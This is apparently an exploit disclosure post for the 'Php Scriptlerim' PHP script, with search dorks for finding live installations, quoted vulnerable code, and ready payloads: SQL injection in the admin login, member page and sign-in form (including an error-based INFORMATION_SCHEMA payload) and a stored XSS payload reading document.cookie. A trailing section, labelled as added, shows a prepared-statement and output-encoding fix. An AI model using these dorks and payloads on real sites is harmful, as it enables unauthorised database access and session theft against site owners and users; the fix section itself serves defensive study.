Powered by Php Scriptlerim Multi Vulnerability

x-Qey

Tested on : Kali Linux / Linux
Author : GRAY HAT
Dorks : "Powered By : Php Scriptlerim" "İletişim : info@phpscriptlerim.com" (TR )
1.

SQL Inj : yonetim/index.php
Panel Code : $query = mysql_query("SELECT * FROM administrator WHERE username='$username'");

EXP : http://localhost/phpscriptlerim/yonetim/index.php

Post Code : username=admin( SQL INJ HERE )&password=admin&gonder=Giri%C5%9F+Yap
2.
SQL Inj : uyedetay.php


Member Code : mysql_query("select * from uyeler where sefurl='$url'"); $url = $_GET['url'];
EXP : http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL( SQL INJ HERE )

http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL%27%20AND%20%28SELECT%203581%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28version%28%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Hvkg%27=%27Hvkg
XSS : uyebilgileri.php

if(isset($_POST['gonder'])){
$text = $_POST['text'];
$text1 = $_POST['text1'];
$password = $_POST['password'];
$parola = md5($password);

if($text==""||$text1==""){ echo '<font color="red"><b>Alanları boş geçemezsiniz.</b></font><br><br>'; }

<li class="clearfix">
<label>İkinci İsim</label>
<input type='text' name='text' value="<?php echo $bbb['text']; ?>" id='name' maxlength="55" />
<div class="clear"></div>


EXP : http://localhost/phpscriptlerim/uyebilgileri.php

XSS post : text=1"><script>alert(document.cookie)</script>&password=&text1=1"><h3>hh</h3>&gonder=Kaydet
SQL Inj : signin.php

if(isset($_POST['gonder'])){
$email = $_POST['email'];
$sifre = $_POST['sifre'];
$tarih = date('Y-m-d');
$parola = md5($sifre);

if($email==""||$sifre==""){ echo '<font color="red"><b>Bütün alanları doldurmanız gerekmektedir.</b></font><br><br>'; }else{

$xlb = mysql_query("SELECT * FROM uyeler WHERE email='$email'");


EXP : http://localhost/phpscriptlerim/signin.php

SQL Post : email=theethical@facebook.com( SQL INJ HERE )&sifre=1111&security=a4f29&gonder=Giri%C5%9F

Admin Panel : http://localhost/phpscriptlerim/yonetim/index.php
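
The fix for the query and output patterns quoted in the post, as an added example that is not part of the original post or the script's own code: bound parameters replace the interpolated `$url` / `$email` / `$username`, and the profile value is HTML-encoded before it is written into the `value` attribute. Assumptions: PDO with the pdo_sqlite driver stands in for the script's MySQL database, the function names and the slug format are hypothetical, and all inputs are constructed.

```php
<?php
// Added example, not the script's code. Assumes PDO with pdo_sqlite as a stand-in for
// the script's MySQL database; table/column names come from the quoted snippets.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE uyeler (id INTEGER PRIMARY KEY, sefurl TEXT, email TEXT, text TEXT)");
$pdo->exec("INSERT INTO uyeler (sefurl, email, text) VALUES ('ethical', 'user@example.test', 'Ali')");

// uyedetay.php pattern: validate the slug, then bind it instead of interpolating it.
function findMemberBySlug(PDO $pdo, string $url): ?array
{
    // Assumed slug format (hypothetical): lowercase letters, digits and hyphens.
    if (!preg_match('/^[a-z0-9-]{1,64}$/', $url)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, sefurl, text FROM uyeler WHERE sefurl = :url');
    $stmt->execute([':url' => $url]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// signin.php / yonetim/index.php pattern: the bound value is always data, never SQL.
function findMemberByEmail(PDO $pdo, string $email): ?array
{
    $stmt = $pdo->prepare('SELECT id, email FROM uyeler WHERE email = :email');
    $stmt->execute([':email' => $email]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// uyebilgileri.php pattern: encode stored values when writing them into an attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: one normal value and one containing a quote, per lookup.
foreach (['ethical', "ethical' AND 'a'='a"] as $slug) {
    $row = findMemberBySlug($pdo, $slug);
    printf("slug  %-34s => %s\n", $slug, $row ? 'member #' . $row['id'] : 'no match');
}
foreach (['user@example.test', "user@example.test' AND 'a'='a"] as $email) {
    $row = findMemberByEmail($pdo, $email);
    printf("email %-34s => %s\n", $email, $row ? 'member #' . $row['id'] : 'no match');
}

// Constructed profile value containing markup; it is rendered as text, not as HTML.
$stored = '1"><b>x</b>';
echo '<input type="text" name="text" value="' . attr($stored) . '" maxlength="55" />', "\n";
```

The `mysql_*` functions used in the quoted snippets were removed in PHP 7.0; with the PDO MySQL driver, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the binding is done by the server.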
 

Copyright® Ajanlar.org 2012